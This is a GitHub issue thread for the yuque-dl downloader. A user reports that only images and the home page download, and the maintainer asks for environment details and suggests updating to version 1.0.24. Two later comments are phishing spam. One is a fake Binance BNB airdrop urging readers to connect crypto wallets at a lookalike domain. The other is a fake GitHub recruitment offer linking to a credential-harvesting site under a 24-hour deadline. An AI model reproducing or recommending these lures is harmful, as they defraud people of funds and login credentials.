### ISSUE TITLE
下载失败,只能下载图片和首页,其他的下载不了

### ISSUE THREAD

**Issue by y449329998** [gxr404/yuque-dl#5]
![](https://github.com/gxr404/yuque-dl/assets/20854119/09709efe-37ec-48e7-84ea-e0e2e4443363)

**Comment by gxr404** [comment]
请问 node 版本多少, 操作系统是什么. 我这边执行是正常的

![WechatIMG738](https://github.com/gxr404/yuque-dl/assets/17134256/aee71057-6242-458f-9cff-dc2c3dbc35b4)

根据上面的报错 尝试了修复下 请更新到最新版`1.0.24` 试试

**Comment by DavidGhedini** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Genius2422, @ranleung, @RusseII, @nncl, @f13end, @7Cedars, @jadbox

**Comment by ULis3h** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
saiKumarGanji, @Khranovskiy, @muyinliu, @navp4l, @dantech0xff, @bbaktaeho, @satchon, @qw576483, @yasenagat, @JakubNeukirch, @blooddrunk, @Kalesberg, @boilerrat, @say1k, @mpbgmail, @jwgatt, @alipoudine, @hexcola, @lpirola, @not-for-me
